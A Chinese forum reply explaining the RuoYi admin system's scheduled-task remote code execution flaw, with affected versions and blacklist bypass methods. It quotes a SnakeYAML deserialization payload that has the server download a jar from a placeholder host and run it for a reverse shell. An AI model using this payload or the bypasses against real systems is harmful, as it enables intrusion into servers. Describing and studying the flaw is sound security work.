|
|
发表于
2025-9-25 22:43:59
来自手机
|
显示全部楼层
来自 陕西
Temorry 发表于 2025-9-25 22:33
感谢分享,没看懂
若依定时任务RCE是若依管理系统中存在的一种远程代码执行漏洞。以下是关于该漏洞的介绍:
漏洞简介:若依管理系统是一款基于Java开发的开源后台管理系统。由于若依后台计划任务处,对于传入的“调用目标字符串”没有任何校验,导致攻击者可以调用任意类、方法及参数触发反射执行命令。
影响版本:RuoYi<4.6.2版本存在该漏洞,4.6.2<=Ruoyi<4.7.2版本采用了黑名单限制调用字符串,但仍可通过在屏蔽的协议加上单引号等方式绕过。此外,RuoYi v4.7.8版本通过定时任务调用genTableServiceImpl直接执行sql来更改定时任务内容,从而绕过黑白名单的限制,实现RCE。
- 漏洞利用方式:攻击者可以在若依后台添加一个计划任务,将“调用目标字符串”设置为恶意代码,例如“org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager (!!java.net.URLClassLoader ((!!java.net.URL ("http://xxx:8080/yaml - payload.jar"))))')”,通过该代码让ScriptEngineManager实例化时去指定路径下载jar包并执行反弹,从而实现远程代码执行。 |
|